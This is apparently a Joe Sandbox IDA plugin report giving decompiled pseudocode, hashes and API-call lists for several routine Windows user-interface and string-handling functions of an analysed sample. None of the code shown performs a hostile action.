Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction ID: 9bbdf3f7d950dda3c106a7053e01199b699c7596eca1dee1c5b4b451079f442e
Opcode Fuzzy Hash: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction Fuzzy Hash: 6D11F431A00208EBEB10EFA0D949B9D7BF8AB04705F6081A5F905B61C0D775AB469B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417178, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417178(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x00417180
0x00417188
0x0041718f
0x00417196
0x0041719d
0x004171aa
0x004171b1
0x004171b4
0x004171b6
0x004171bb

APIs

GetSysColor.USER32(0000000F), ref: 00417184
GetSysColor.USER32(00000010), ref: 0041718B
GetSysColor.USER32(00000014), ref: 00417192
GetSysColor.USER32(00000012), ref: 00417199
GetSysColor.USER32(00000006), ref: 004171A0
GetSysColorBrush.USER32(0000000F), ref: 004171AD
GetSysColorBrush.USER32(00000006), ref: 004171B4

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction ID: 88891574432b8891f472ad4648ce297f27c70735abb480ab9afea6e1339babde
Opcode Fuzzy Hash: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction Fuzzy Hash: 3AF01C71A407489BD730BF729D49B47BBE0FFC4B10F42092EE2858BA91E6B5A401DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042047F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042047F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L6:
						 *0x439628 =  *0x439628 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L6;
					}
					goto L5;
				} else {
					L5:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x439628 = _t6;
					return _t6;
				}
			}

0x00420495
0x0042049f
0x004204a3
0x004204bf
0x004204bf
0x00000000
0x004204bf
0x004204a5
0x004204ab
0x00000000
0x00000000
0x00000000
0x004204ad
0x004204ad
0x004204b2
0x004204b8
0x00000000
0x004204b8

APIs

GetVersion.KERNEL32 ref: 0042048C
GetVersion.KERNEL32 ref: 00420497
GetVersion.KERNEL32 ref: 0042049F
GetVersion.KERNEL32 ref: 004204A5
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 004204B2

Strings

MSWHEEL_ROLLMSG, xrefs: 004204AD

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction ID: 25fbbff43e00deea4677d8a477c73a5b9be4ee826b54bccf5d226778cb27c547
Opcode Fuzzy Hash: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction Fuzzy Hash: DFE0803EF0123646D72137647C0436E66D49F88360FE5D17BDB41423555A7C484346BE

Uniqueness

Uniqueness Score: -1.00%

Function 00426D87, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00426D87(void* __ecx) {
				struct HDC__* _t87;
				intOrPtr* _t88;
				struct HDC__* _t97;
				intOrPtr _t98;
				int _t100;
				struct HDC__* _t110;
				int _t122;
				intOrPtr* _t126;
				void* _t136;
				intOrPtr* _t137;
				struct HDC__** _t138;
				int _t153;
				intOrPtr _t157;
				signed short _t171;
				int _t175;
				void* _t178;
				void* _t180;

				E00406520(E0042A133, _t180);
				_t178 = __ecx;
				 *(__ecx + 0x70) =  *(_t180 + 8);
				_t87 = E004131DD(0x3c);
				 *(_t180 + 8) = _t87;
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00428824(_t87);
				}
				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
				_t175 = 1;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
				_t97 = E004131DD(0x40);
				 *(_t180 + 8) = _t97;
				_t186 = _t97;
				 *(_t180 - 4) = _t175;
				if(_t97 == 0) {
					_t98 = 0;
					__eflags = 0;
				} else {
					_t98 = E00428A66(_t97, _t186);
				}
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
				if(_t100 != 0) {
					_t137 = _t178 + 0x78;
					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
					 *(_t178 + 0x84) = _t175;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t178 + 0x1c));
					 *(_t180 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t178 + 0x80;
					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
					_t188 = _t122;
					 *(_t178 + 0xf8) = _t122;
					if(_t122 != 0) {
						_t153 =  *(_t178 + 0xf0);
						__eflags = _t122 - _t153;
						if(__eflags > 0) {
							 *(_t178 + 0xf8) = _t153;
						}
					} else {
						 *(_t178 + 0xf8) = _t175;
					}
					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
					_push(0x42e4b0);
					_push(0x42e4b0);
					_push(_t175);
					_push(_t175);
					_push(_t175);
					E0041AE9C(_t178, _t188);
					_t126 =  *((intOrPtr*)(_t178 + 0x114));
					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
					} else {
						 *((intOrPtr*)(_t180 - 0x24)) = 3;
						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
						 *(_t180 - 0x18) = _t175;
						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
						}
					}
					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
					_t100 = _t175;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t100;
			}

0x00426d8c
0x00426d98
0x00426d9d
0x00426da0
0x00426da6
0x00426da9
0x00426daf
0x00426dba
0x00426dba
0x00426db1
0x00426db3
0x00426db3
0x00426dbc
0x00426dc4
0x00426dca
0x00426dd7
0x00426ddf
0x00426dee
0x00426df8
0x00426dfb
0x00426e01
0x00426e04
0x00426e06
0x00426e09
0x00426e14
0x00426e14
0x00426e0b
0x00426e0d
0x00426e0d
0x00426e1f
0x00426e23
0x00426e28
0x00426e30
0x00426e3d
0x00426e4a
0x00426e62
0x00426e6a
0x00426e6f
0x00426e75
0x00426e7b
0x00426e85
0x00426e8a
0x00426e9b
0x00426ea6
0x00426eaf
0x00426ebb
0x00426ebe
0x00426ed0
0x00426ede
0x00426eec
0x00426eef
0x00426ef1
0x00426ef7
0x00426f01
0x00426f07
0x00426f09
0x00426f0b
0x00426f0b
0x00426ef9
0x00426ef9
0x00426ef9
0x00426f19
0x00426f24
0x00426f25
0x00426f26
0x00426f27
0x00426f28
0x00426f2b
0x00426f30
0x00426f38
0x00426f3b
0x00426f44
0x00426fa0
0x00426f57
0x00426f57
0x00426f68
0x00426f76
0x00426f7e
0x00426f88
0x00426f94
0x00426f94
0x00426f88
0x00426fb2
0x00426fb7
0x00426fb9
0x00426fbf
0x00426fc7

APIs

__EH_prolog.LIBCMT ref: 00426D8C
GetDC.USER32(?), ref: 00426E7B
ReleaseDC.USER32 ref: 00426EAF
GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A040, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x42f5e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x439f04; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x439efc; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406330(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x439eec; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x439f04 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x0040a043
0x0040a045
0x0040a04a
0x0040a055
0x0040a056
0x0040a05d
0x0040a063
0x0040a066
0x0040a06f
0x0040a0af
0x0040a0b2
0x0040a0db
0x00000000
0x0040a0e1
0x0040a0e4
0x0040a0e6
0x0040a0eb
0x0040a0eb
0x0040a0fb
0x0040a105
0x0040a10b
0x0040a110
0x00000000
0x0040a112
0x0040a112
0x0040a11f
0x0040a124
0x0040a127
0x0040a129
0x0040a12f
0x0040a144
0x0040a14a
0x00000000
0x0040a14c
0x0040a15b
0x0040a163
0x00000000
0x0040a165
0x0040a16d
0x0040a16d
0x0040a163
0x0040a14a
0x0040a110
0x0040a0b4
0x0040a0b4
0x0040a0b9
0x0040a0bb
0x0040a0bb
0x0040a0cd
0x0040a0cd
0x0040a071
0x0040a074
0x0040a077
0x0040a087
0x0040a0a1
0x0040a175
0x0040a175
0x0040a0a7
0x0040a0a9
0x00000000
0x0040a0a9
0x0040a089
0x0040a089
0x0040a0aa
0x0040a0aa
0x00000000
0x0040a0aa
0x0040a087
0x0040a17d
0x0040a188

APIs

GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00424DFE, Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424DFE(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E00406520(E0042A538, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E0042500B(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				E0041A369(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					E0041A3DB(_t91 - 0x38);
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t14 = _t86 + 0x10; // 0x10
					_t90 = _t14;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E00417214(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

0x00424e03
0x00424e11
0x00424e13
0x00424e16
0x00424e1d
0x00424f28
0x00424f2c
0x00424f34
0x00424f34
0x00424e26
0x00424e29
0x00424e30
0x00424f19
0x00424f1f
0x00424f24
0x00000000
0x00424f27
0x00424e3e
0x00424e44
0x00424e48
0x00424e4a
0x00424e51
0x00424e54
0x00424e57
0x00424e63
0x00424e63
0x00424e69
0x00424e6c
0x00424e6f
0x00424ef8
0x00424efc
0x00424f04
0x00424f04
0x00424f0a
0x00424f11
0x00424f16
0x00000000
0x00424e75
0x00424e75
0x00424e75
0x00424e78
0x00424e7b
0x00424e7f
0x00424e81
0x00424e85
0x00424e87
0x00424e89
0x00424ec7
0x00424ecf
0x00424ed0
0x00424ed3
0x00424ed6
0x00424ed9
0x00424edb
0x00424edb
0x00424edb
0x00424edb
0x00000000
0x00424ed9
0x00424e95
0x00424ef5
0x00424ef5
0x00000000
0x00424ef5
0x00424ea5
0x00424eb1
0x00424eb6
0x00424eb7
0x00424eb8
0x00424ec2
0x00000000
0x00000000
0x00424ee2
0x00424ee2
0x00424ee5
0x00424ee8
0x00424eee
0x00000000
0x00424ef3

APIs

__EH_prolog.LIBCMT ref: 00424E03
SendMessageA.USER32(0000E800,00000031,00000000,00000000), ref: 00424E3E

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SelectObject.GDI32(?,00000000), ref: 00424E5D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
GetSystemMetrics.USER32 ref: 00424EC7
SelectObject.GDI32(?,?), ref: 00424F04

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420341, Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00420341(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t59 = GetCapture;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E00420031(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t31 = _v32.message - 0x100;
						if(_t31 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E0041FA60(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t33 = E00413740(_t61, GetCapture());
								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t35 = _t31 - 1;
						if(_t35 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E0041FA60(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t37 = _t35 - 0xff;
						if(_t37 == 0) {
							_t55 = _v32.pt;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t58 = _v8;
							_push(_t55);
							_push(_t55);
							_t38 = _t62;
							 *_t38 = _t55;
							 *((intOrPtr*)(_t38 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E0041FCEC(_t56, _t59);
							} else {
								E0041F9E4(_t56);
							}
							goto L18;
						}
						_t42 = _t37;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E0041FE54(_t61, __eflags);
							} else {
								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
							}
							_t44 = 1;
							return _t44;
						}
						if(_t42 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					E00429977(_v32.wParam);
					goto L19;
				}
			}

0x00420341
0x0042034a
0x00420350
0x00420356
0x00420430
0x00000000
0x00420430
0x00420369
0x00420379
0x00420429
0x0042042b
0x00000000
0x0042037f
0x00420381
0x00420399
0x0042039e
0x004203fe
0x00420404
0x0042040d
0x0042040d
0x00420412
0x00420416
0x00420418
0x0042041b
0x00420420
0x00420423
0x00000000
0x00000000
0x00420423
0x00000000
0x00420416
0x004203a0
0x004203a1
0x004203e9
0x004203ef
0x004203f7
0x004203f7
0x00000000
0x004203ef
0x004203a3
0x004203a8
0x004203c2
0x004203c5
0x004203cb
0x004203ce
0x004203cf
0x004203d0
0x004203d2
0x004203d4
0x004203d7
0x004203d9
0x004203e2
0x004203db
0x004203db
0x004203db
0x00000000
0x004203d9
0x004203ab
0x004203ac
0x00420441
0x00420447
0x00420449
0x00420452
0x0042044b
0x0042044b
0x0042044b
0x00420459
0x00000000
0x00420459
0x004203b4
0x00000000
0x00000000
0x004203ba
0x00000000
0x004203ba
0x0042043a
0x00000000
0x0042043a

APIs

GetCapture.USER32 ref: 00420352
SetCapture.USER32(?), ref: 00420362
GetCapture.USER32 ref: 0042036E
GetMessageA.USER32 ref: 00420388
DispatchMessageA.USER32 ref: 004203BA
GetCapture.USER32 ref: 00420418

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
